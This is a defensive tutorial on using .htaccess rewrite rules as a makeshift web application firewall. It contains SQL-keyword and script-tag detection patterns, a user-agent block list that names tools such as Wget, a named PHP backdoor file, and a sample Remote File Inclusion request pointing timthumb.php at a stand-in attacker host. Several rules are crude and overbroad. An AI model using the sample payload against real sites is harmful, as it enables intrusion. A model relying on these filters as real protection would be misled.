7 Tips: .htaccess as Web Application Firewall (WAF) to secure your website

How to use .htaccess as a Web Application Firewall (WAF) and block exploits and rogue HTTP requests. Sometimes you have no choice but to protect your website yourself, for example when your hosting provider doesn't offer a Web Application Firewall (WAF) [2] security solution.

Learn how to secure your website using .htaccess files – 7 .htaccess security examples

What .htaccess rules can you use to protect your website from online threats?

Be careful, though: web application security firm Acunetix warns against relying on .htaccess files for security restrictions.

You can use .htaccess on Windows Server and IIS with Helicon Ape. It is pretty easy to set up and configure your .htaccess file as a sort of web application firewall. When used properly, this is one way to protect your website from known and unknown exploits or threats.

A Web Application Firewall (WAF)

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) ([2]) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
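For illustration only, a single mod_rewrite rule already behaves like a very basic WAF rule: it inspects part of the HTTP conversation (here the query string) and rejects requests that match a known attack pattern. A minimal sketch, separate from the examples later in this post:

# Minimal WAF-style rule (illustration only): reject query strings
# that contain an opening <script tag, plain or URL-encoded
RewriteEngine On
RewriteCond %{QUERY_STRING} (<|%3C)script [NC]
RewriteRule .? - [F]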

Helicon Ape can be used, in a way, to prevent basic SQL injection attacks too. There is a small downside though: the .htaccess file has to be read on every HTTP request, and even though it is cached for some time, this may cost some performance.

Using the .htaccess rewrite rules below, you can protect your website somewhat from online threats. An important prerequisite is that you know your own website: you need to know which requests are expected and valid, and which requests need to be blocked.

Some simple examples:

Magento app/etc/local.xml security

Protect Magento’s app/etc/local.xml file containing MySQL database credentials.

# Secure Magento's local.xml file which contains MySQL database credentials
# See http://www.saotn.org/magento-appetclocal-xml-beveiliging/
# 
RewriteEngine On
RewriteCond %{REQUEST_URI} app/etc/local\.xml$ [NC]
RewriteRule .? - [F,L]

Protect against known SQL injection attacks through HTTP GET

# protect your website from some known SQL injection attacks:
RewriteEngine On
# match common SQL keywords and functions in the request line
# works only on HTTP GET, *not* POST body
RewriteCond %{THE_REQUEST} (?:limit|union|select|concat|1==1|like|drop|#|--) [NC]
RewriteRule .? - [F,L]

Block spam bots in a .htaccess file

# block spambots (unverified!)
RewriteEngine On
RewriteCond %{HTTP:User-Agent} (?:Alexibot|Art-Online|asterias|BackDoorbot|Black.Hole|BlackWidow|BlowFish|botALot|BuiltbotTough|Bullseye|BunnySlippers|Cegbfeieh|Cheesebot|CherryPicker|ChinaClaw|CopyRightCheck|cosmos|Crescent|Custo|DISCo|DittoSpyder|DownloadsDemon|eCatch|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|ExpresssWebPictures|ExtractorPro|EyeNetIE|FlashGet|Foobot|FrontPage|GetRight|GetWeb!|Go-Ahead-Got-It|Go!Zilla|GrabNet|Grafula|Harvest|hloader|HMView|httplib|HTTrack|humanlinks|ImagesStripper|ImagesSucker|IndysLibrary|InfonaviRobot|InterGET|InternetsNinja|Jennybot|JetCar|JOCsWebsSpider|Kenjin.Spider|Keyword.Density|larbin|LeechFTP|Lexibot|libWeb/clsHTTP|LinkextractorPro|LinkScan/8.1a.Unix|LinkWalker|lwp-trivial|MasssDownloader|Mata.Hari|Microsoft.URL|MIDownstool|MIIxpc|Mister.PiX|MistersPiX|moget|Mozilla/3.Mozilla/2.01|Mozilla.*NEWT|Navroad|NearSite|NetAnts|NetMechanic|NetSpider|NetsVampire|NetZIP|NICErsPRO|NPbot|Octopus|Offline.Explorer|OfflinesExplorer|OfflinesNavigator|Openfind|Pagerabber|PapasFoto|pavuk|pcBrowser|ProgramsSharewares1|ProPowerbot/2.14|ProWebWalker|ProWebWalker|psbot/0.1|QueryN.Metasearch|ReGet|RepoMonkey|RMA|SiteSnagger|SlySearch|SmartDownload|Spankbot|spanner|Superbot|SuperHTTP|Surfbot|suzuran|Szukacz/1.4|tAkeOut|Teleport|TeleportsPro|Telesoft|The.Intraformant|TheNomad|TightTwatbot|Titan|toCrawl/UrlDispatcher|toCrawl/UrlDispatcher|True_Robot|turingos|Turnitinbot/1.5|URLy.Warning|VCI|VoidEYE|WebAuto|WebBandit|WebCopier|WebEMailExtrac.*|WebEnhancer|WebFetch|WebGosIS|Web.Image.Collector|WebsImagesCollector|WebLeacher|WebmasterWorldForumbot|WebReaper|WebSauger|WebsiteseXtractor|Website.Quester|WebsitesQuester|Webster.Pro|WebStripper|WebsSucker|WebWhacker|WebZip|Wget|Widow|[Ww]eb[Bb]andit|WWW-Collector-E|WWWOFFLE|XaldonsWebSpider|Xenu's|Zeus) [NC]
RewriteRule .? - [F]

Deny access to known PHP backdoors like l_backuptoster.php

# Deny access to l_backuptoster.php / l_backuptoster_backup.php (PHP backdoor)
RewriteEngine On
RewriteCond %{REQUEST_URI} (^/l_backuptoster\.php) [NC]
# or to match the file in any location
# RewriteCond %{REQUEST_URI} (l_backuptoster\.php) [NC]
# or expanded to also cover the _backup variant
# RewriteCond %{REQUEST_URI} l_backuptoster(_backup)?\.php [NC]
RewriteRule .? - [F,L]

Joomla! Search Engine Friendly (SEF) .htaccess

# From the standard Joomla! .htaccess file, as reference
# 
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]

The flag F means “Forbidden” and L is “Last” (stop rewriting this request).
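If you don't want visitors to see the server's default error page on blocked requests, you can pair the [F] flag with a custom 403 page. A minimal sketch, assuming a 403.html file exists in your web root:

# Serve a custom page for 403 Forbidden responses (403.html is an assumed file)
ErrorDocument 403 /403.html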


.htaccess RewriteMap as blacklist

With a RewriteMap, you can block the IP addresses of known abusers. Note that in stock Apache, the RewriteMap directive has to be defined in the server or virtual host configuration rather than in .htaccess; with Helicon Ape / ISAPI_Rewrite on IIS you can declare it as shown below:

Create a text file called "blacklist.txt" and place the IP addresses you want to block in that file. Because a RewriteMap uses a key / value structure, you have to add one key/value pair per line, for example 203.0.113.15 -. The IP address 203.0.113.15 is the key, and - is the value.
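For example, a minimal blacklist.txt could look like this (the IP addresses below are documentation examples, replace them with the addresses you want to block):

# blacklist.txt - one key/value pair per line
203.0.113.15 -
198.51.100.23 -
192.0.2.99 -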

Preferably put your blacklist.txt file outside the web root, and declare it in your .htaccess file as a RewriteMap:

RewriteMap blacklist txt:D:/path/to/your/blacklist.txt [NC]
RewriteCond %{REMOTE_ADDR} (.*)
RewriteCond ${blacklist:%1|NOT_FOUND} !NOT_FOUND
RewriteRule .? - [F,L]

Line by line explanation

  1. you declare a map named 'blacklist', backed by the file 'blacklist.txt'
  2. the REMOTE_ADDR (the visitor's IP address) is captured as the lookup key
  3. the captured REMOTE_ADDR is looked up in the blacklist.txt map
  4. if a value is found (the lookup does not return NOT_FOUND), the RewriteRule is executed and the request is denied (a shorter variation of this lookup is shown below)

Reference http://helicontech.blogspot.com/2009/02/isapirewrite-faq.html.
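A slightly shorter variation is to use the visitor's IP address directly as the lookup key inside the map expansion, which skips the capturing RewriteCond. This is only a sketch and assumes the same blacklist map declared above:

RewriteMap blacklist txt:D:/path/to/your/blacklist.txt
# look up REMOTE_ADDR directly in the map; deny the request when the key is present
RewriteCond ${blacklist:%{REMOTE_ADDR}|NOT_FOUND} !NOT_FOUND
RewriteRule .? - [F,L]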

A ready-to-use PHP blacklist web application can be found here:
Filter web traffic with blacklists. Always verify with your host whether .htaccess files are supported.

Block out known, and unknown 0-day, Remote File Inclusion exploits

If your hosting provider offers support for .htaccess files and you stay on top of new vulnerabilities in web software, you can make use of the rewriting capability of .htaccess, whether that is Apache mod_rewrite or Helicon Ape in IIS on Windows Server. Use the rewrite engine, for instance, to block out known, and even unknown, vulnerabilities in the software you use.

You can block out known, and even yet unknown 0-day, exploits by matching on QUERY_STRING, REQUEST_URI or REQUEST_FILENAME. In the part above, I showed you how to protect your website from known exploits.
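As a sketch of what such a rule could look like when a vulnerability is announced in a specific script, the file name vulnerable-uploader.php and the parameter cmd= below are made-up placeholders, substitute the affected file and parameter:

RewriteEngine On
# block direct requests to the affected script by its path
RewriteCond %{REQUEST_URI} vulnerable-uploader\.php [NC,OR]
# ...or block requests that abuse the affected query string parameter
RewriteCond %{QUERY_STRING} cmd= [NC]
RewriteRule .? - [F,L]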


What now follows is a practical tip to block Remote File Inclusion (RFI) and Cross-Site Scripting (XSS) attacks, simply by blocking all requests that point to external HTTP addresses and websites.

Use a .htaccess rule to block requests to remote URLs & secure your website

Lots of vulnerabilities in scripts are exploited by requesting remote files and content. This is called Remote File Inclusion: the output of remote scripts is executed within the context of the vulnerable script and server. A notorious example is Timthumb, which is used in many WordPress themes and plugins.

If you know what to look for, you can easily block those requests to remote files with a .htaccess file, for example when a remote domain name is provided as a URL parameter. The following example looks at the ?src= query string parameter and blocks the request if it doesn't reference our own domain name.

RewriteEngine On
# 1: the query string contains a src= parameter
RewriteCond %{QUERY_STRING} (src=) [NC]
# 2: an (optional) http:// or https:// protocol prefix
RewriteCond %{QUERY_STRING} ((http(s)?)://)? [NC]
# 3: the query string does not reference our own domain name
RewriteCond %{QUERY_STRING} !((.+\.)?(example\.com)) [NC]
RewriteRule .? / [F,L]

Replace example.com with your own domain name. You need to escape the dot (".") in the expression with a backslash \.

The .htaccess rule explained
The above .htaccess rule evaluates three conditions against the query string and blocks the request with a Forbidden flag when all conditions are met.

  1. if src= is provided in the query string
  2. and optional HTTP or HTTPS as protocol
  3. if it doesn’t contain your own domain name example.com
  4. then refuse the request

For example, an HTTP request with the query string parameter ?src= set to http://evil_hacker_site.com:

http://localhost/wp-content/themes/thema/timthumb.php?src=http://evil_hacker_site.com/exploit.php

Is blocked with a 403 Forbidden HTTP status code.

RewriteCond matching in .htaccess
The above RewriteCond conditions match anywhere in the query string, not only within the src= parameter. Keep that in mind: the following URL is matched (and blocked) too:

http://localhost/wp-content/themes/thema/timthumb.php
  ?foo=http://&src=123&bar=example.com

Also, try to combine as much as possible into a single condition:

RewriteEngine On
RewriteCond %{QUERY_STRING} src=(http(s)?://)?(?!((.+\.)?example\.com)) [NC]
RewriteRule .? / [F,L]
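If you want the condition to apply only to the actual src parameter, and not to src= appearing somewhere inside another value, you can anchor it to the start of the query string or to a preceding &. A sketch under that assumption:

RewriteEngine On
# match src= only at the start of the query string or directly after an &
RewriteCond %{QUERY_STRING} (^|&)src=(http(s)?://)?(?!((.+\.)?example\.com)) [NC]
RewriteRule .? - [F,L]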
